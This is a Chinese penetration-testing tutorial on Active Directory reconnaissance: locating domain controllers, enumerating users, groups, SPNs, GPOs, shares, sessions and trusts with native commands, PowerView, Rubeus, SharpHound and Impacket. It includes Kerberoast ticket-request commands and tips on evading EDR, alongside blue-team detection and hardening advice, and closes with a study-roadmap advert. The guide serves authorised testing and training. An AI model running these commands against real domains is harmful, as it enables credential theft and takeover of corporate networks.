ARTICLE DETAIL

建站实战干货

来自一线的建站与推广经验沉淀,每一条都经过真实交付验证。

域环境渗透基础:域内信息收集方法

2026/9/29 14:21:23 拓冰建站 浏览量
域环境渗透基础:域内信息收集方法 域环境渗透基础域内信息收集方法前言在域渗透完整攻击链中信息收集是所有攻击的起点。拿到域内一台机器的低权限 shell 之后第一件事不是直接尝试拿域控而是摸清整个 AD 域环境架构域名、域控位置、用户、组、机器、服务账号、组策略、共享、信任关系。AD 域有一个很关键的特点任意普通域用户默认就可以查询大量域信息不需要管理员权限。很多新手拿到域内主机之后只会简单执行几条 net 命令漏掉大量高价值信息导致找不到攻击路径。本文从本机判断是否在域内 → 定位域控 → 用户 / 组枚举 → SPN、GPO、共享、域信任 → BloodHound 可视化整理域内信息收集全套方法包含系统原生命令、PowerView、SharpHound适合靶场练习与授权渗透测试使用。免责声明本文内容仅用于授权环境安全测试、AD 靶场学习。严禁在未授权企业域环境执行域信息收集、渗透攻击未经授权的内网攻击行为违反《网络安全法》需承担法律责任。一、第一步判断当前主机是否加入域本机基础信息拿到 shell首先确认当前机器是工作组机器还是域内成员主机当前登录账号是本地账号还是域账号。CMD 原生命令# 查看当前登录用户判断是否域账号 whoami # 查看系统信息域名、域控信息 systeminfo # 查看登录的域控制器logonserver非常重要 set logonserver # 查看本机用户和本地管理员组 net user net localgroup administrators # 查看当前主机名、域名 echo %USERDNSDOMAIN%如果USERDNSDOMAIN为空代表当前机器不在域%logonserver%的值就是当前主机认证的域控机器名。PowerShell 查看# 获取域信息 Get-ADDomain # 获取当前计算机对象信息 Get-ADComputer $env:COMPUTERNAME二、第二步定位域控制器DC域控是整个 AD 核心保存所有账号、组策略。我们需要拿到域控的机器名、IP、DNS 记录。CMD 方式# 查看域内所有域控制器 net group Domain Controllers /domain # 通过DNS SRV记录查找域控推荐 nslookup -typesrv _ldap._tcp.dc._msdcs.shturl. # ping域名解析域控IP ping shturl.PowerViewPowerShell# 获取所有域控 Get-DomainController端口特征域控默认开放 53 (DNS)、88 (Kerberos)、389 (LDAP)、445、3389、5985 等。三、第三步域用户与用户组枚举目标找出域普通用户、域管理员组、高权限账号筛选可用于 Kerberoast、AS-REP Roast 的账号。CMD 原生命令无文件落地推荐优先使用# 查询域内所有用户 net user /domain # 查询域内所有组 net group /domain # 查询Domain Admins域管理员组成员 net group Domain Admins /domain # 查询Enterprise Admins企业管理员林根域 net group Enterprise Admins /domainPowerView 查询信息更完整# 获取域全部用户 Get-DomainUser # 获取域全部组 Get-DomainGroup # 查询Domain Admins组成员递归 Get-DomainGroupMember -Identity Domain Admins -Recurse # 查询保护组AdminCount1的账号高价值账号 Get-DomainUser -AdminCount重点关注Domain Admins域管理员Enterprise Admins企业管理员Account Operators、Backup Operators 这类内置特权组四、SPN 枚举为 Kerberoast 攻击做准备SPN服务主体名称绑定在域账号上普通域用户即可查询。找到绑定 SPN 的域用户账号就可以请求 TGS 票据进行离线爆破Kerberoast 烤羊毛。Windows 自带 setspn无需额外脚本# 查询当前域所有SPN setspn -T shturl. -Q */*PowerView# 列出所有带有SPN的域用户账号过滤机器账号$ Get-DomainUser -SPNRubeusRubeus.exe kerberoast /list筛选技巧过滤名字以$结尾的机器账号机器账号密码是强随机密码几乎无法爆破只保留域用户账号作为 Kerberoast 目标。五、GPO 组策略枚举查找配置错误、GPP 密码组策略 GPO 可以批量给域内主机推送配置。旧版组策略首选项 GPP 会把账号密码保存在 SYSVOL 共享中虽然 AES 加密但密钥公开可以直接解密拿到明文密码是经典的域内漏洞。# 查询域内所有GPO Get-DomainGPO # 查找GPP包含密码的策略SYSVOL Find-GPOComputerAdminSYSVOL 路径\\shturl.\SYSVOL域内所有机器都可读重点搜索cpassword关键字。六、域共享文件夹枚举查找域内开放的共享里面经常存放文档、备份文件、配置文件容易泄露账号密码。# CMD查看域共享 net view \\dc01.shturl. # PowerView查找域内所有可读共享 Find-DomainShare -CheckShareAccess重点关注SYSVOL、NETLOGON、部门文件共享、备份共享。七、会话枚举查找域管理员登录在哪台机器这一步是域渗透非常关键的一步找到域管理员当前登录的主机。只要拿下这台主机dump 内存就能拿到域管凭证直接横向拿下域控。PowerView# 查找域管理员登录的机器 Invoke-UserHunter # 轻量版本更隐蔽 Invoke-StealthUserHunter原理查询各主机的登录会话找到 Domain Admin 登录的机器。拿到目标主机后优先对这台机器进行提权、抓取凭证。八、域信任关系枚举跨域 / 跨林渗透大型企业会有多个域存在域信任关系。如果当前域和子域、外部域存在双向信任拿到当前域权限可进一步跨域渗透。# 查询域信任关系 Get-DomainTrust信任类型父 - 子域信任、外部信任、林信任。九、BloodHound血犬AD 可视化分析BloodHound 是域渗透神器核心思路收集 AD 所有对象关系用图数据库展示攻击路径。普通域用户权限就可以采集数据。采集器 SharpHoundC#执行采集SharpHound.exe -c all执行完成生成 zip 数据包2. Neo4j 数据库 BloodHound 客户端导入 zip3. 常用查询查找 Domain Admin查找可 Kerberoast 账号查找普通用户到域控的最短攻击路径查找可利用的 ACL 权限。注意SharpHound 会批量查询大量 AD 对象会产生大量日志极易触发 EDR 和蓝队告警。红蓝对抗实战不要直接-c all可以选择部分采集降低动静。十、Linux 下代理枚举不落地文件适合 socks 隧道如果已经建立 socks 代理在攻击机使用 Impacket 套件不用在 Windows 跳板上传任何脚本减少落地风险。# 枚举域用户 python3 GetADUsers.py shturl./user:Password192.168.1.10 # 枚举SPN请求TGS票据Kerberoast python3 GetUserSPNs.py shturl./user:Password192.168.1.10 -requestCrackMapExec 批量探测内网主机 SMBcrackmapexec smb 192.168.1.0/24 -u user -p Password十一、信息收集优先级与实战流程推荐按照这个顺序收集信息由浅入深由本机到整个域判断当前主机是否在域、当前账号权限获取域名、定位域控 IP枚举域用户、域管理员组SPN 枚举筛选 Kerberoast 目标GPO 与 SYSVOL 共享查找 GPP 密码查找域内共享文件会话枚举定位域管理员登录主机域信任关系BloodHound 可视化梳理攻击路径。实战原则优先原生系统命令尽量少上传 PowerView、SharpHound 这类工具。工具落地会触发杀毒 / EDR 告警net、setspn、nslookup 属于系统自带程序行为更隐蔽。十二、蓝队检测与加固方案报告加固建议检测审计监控 LDAP 大量查询行为短时间大量查询用户、组、SPN监控 SharpHound、PowerView、Rubeus 等工具进程审计 SYSVOL 异常访问大量读取组策略文件监控 4769 事件批量 TGS 票据请求Kerberoast监测异常会话查询、远程 NetSessionEnum 调用。加固方案最小权限普通域用户不要分配多余权限清理无用 SPN服务账号使用 gMSA 托管账号抵御 Kerberoast淘汰旧 GPP删除 SYSVOL 中遗留 cpassword 密码限制普通用户远程查询其他主机登录会话域内账号设置强密码保护 Domain Admin 账号禁止域管理员日常登录普通工作站监控 LDAP 查询日志对批量 AD 查询行为告警。十三、实战踩坑清单❌坑 1拿到普通域账号直接执行 SharpHound 全采集触发 EDR 告警红蓝对抗中优先手动命令收集BloodHound 作为后期辅助分析不要上来直接全量采集。❌坑 2SPN 枚举后拿机器账号带 $尝试 Kerberoast机器账号密码是随机强密码爆破几乎不可能成功只筛选域用户账号。❌坑 3找到 Domain Admin 组但是该账号没有登录任何机器域管账号不登录工作站就无法在工作站 dump 凭证需要寻找其他攻击路径如 ACL、GPO 漏洞。❌坑 4GPP 已经修复还在疯狂搜索 cpassword2012 之后微软修复 GPP 漏洞新环境很难找到 cpassword不要把所有希望放在这里。❌坑 5信息收集完不整理信息杂乱找不到攻击入口收集信息之后整理域控 IP、域管理员列表、SPN 账号、共享、管理员登录主机才能选择后续攻击手段。十四、总结域内信息收集本质就是利用 AD 原生查询接口绘制整个域的用户、机器、权限关系图。AD 默认允许普通域用户读取大量目录信息这也是域渗透前期最核心的攻击面。所有域攻击Kerberoast、ASREPRoast、GPP 漏洞、ACL 攻击、跨域渗透都依赖信息收集。信息收集越完整越容易找到简单的配置漏洞而不是硬找系统漏洞。一句话记住域渗透先收集后攻击优先系统自带命令减少工具落地核心目标定位域管理员登录机器、高价值 SPN 账号。最后网络安全需要学习那些知识网络安全零基础入门学习路线规划初级1、网络安全理论知识2天①了解行业相关背景前景确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。非常重要2、渗透测试基础一周①渗透测试的流程、分类、标准②信息收集技术主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理利用方法、工具MSF、绕过IDS和反病毒侦察④主机攻防演练MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础一周①Windows系统常见功能和命令②Kali Linux系统常见功能和命令③操作系统安全系统入侵排查/系统加固基础4、计算机网络基础一周①计算机网络基础、协议和架构②网络通信原理、OSI模型、数据转发流程③常见协议解析HTTP、TCP/IP、ARP等④网络攻击技术与网络安全防御技术⑤Web漏洞原理与防御主动/被动攻击、DDOS攻击、CVE漏洞复现5、数据库基础操作2天①数据库基础②SQL语言基础③数据库安全加固6、Web渗透1周①HTML、CSS和JavaScript简介②OWASP Top10③Web漏洞扫描工具④Web渗透工具Nmap、BurpSuite、SQLMap、其他菜刀、漏扫等恭喜你如果学到这里你基本可以从事一份网络安全相关的工作比如渗透测试、Web 渗透、安全服务、安全分析等岗位如果等保模块学的好还可以从事等保工程师。薪资区间6k-15k到此为止大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗想要入坑黑客网络安全的朋友给大家准备了一份282G全网最全的网络安全资料包免费领取7、脚本编程初级/中级/高级在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中面对复杂多变的网络环境当常用工具不能满足实际需求的时候往往需要对现有工具进行扩展或者编写符合我们要求的工具、自动化脚本这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中想要高效地使用自制的脚本工具来实现各种目的更是需要拥有编程能力.零基础入门建议选择脚本语言Python/PHP/Go/Java中的一种对常用库进行编程学习 搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP IDE强烈推荐Sublime ·Python编程学习学习内容包含语法、正则、文件、 网络、多线程等常用库推荐《Python核心编程》不要看完 ·用Python编写漏洞的exp,然后写一个简单的网络爬虫 ·PHP基本语法学习并书写一个简单的博客系统 熟悉MVC架构并试着学习一个PHP框架或者Python框架 (可选) ·了解Bootstrap的布局或者CSS。8、超级黑客这部分内容对零基础的同学来说还比较遥远就不展开细说了贴一个大概的路线。网络安全工程师企业级学习路线视频配套资料国内外网安书籍、文档工具当然除了有配套的视频同时也为大家整理了各种文档和书籍资料工具并且已经帮大家分好类了。一些我自己买的、其他平台白嫖不到的视频教程要学习网安其实不难难的是坚持和相信自己我的经验是既然已经选定网安你就要相信它相信它能成为你日后进阶的高效渠道这样自己才会更有信念去学习才能在碰到困难的时候坚持下去。机会属于有准备的人这是一个实力的时代。人和人之间的差距不在于智商而在于如何利用业余时间只要你想学习什么时候开始都不晚不要担心这担心那你只需努力剩下的交给时间这份完整版的学习资料已经上传CSDN朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】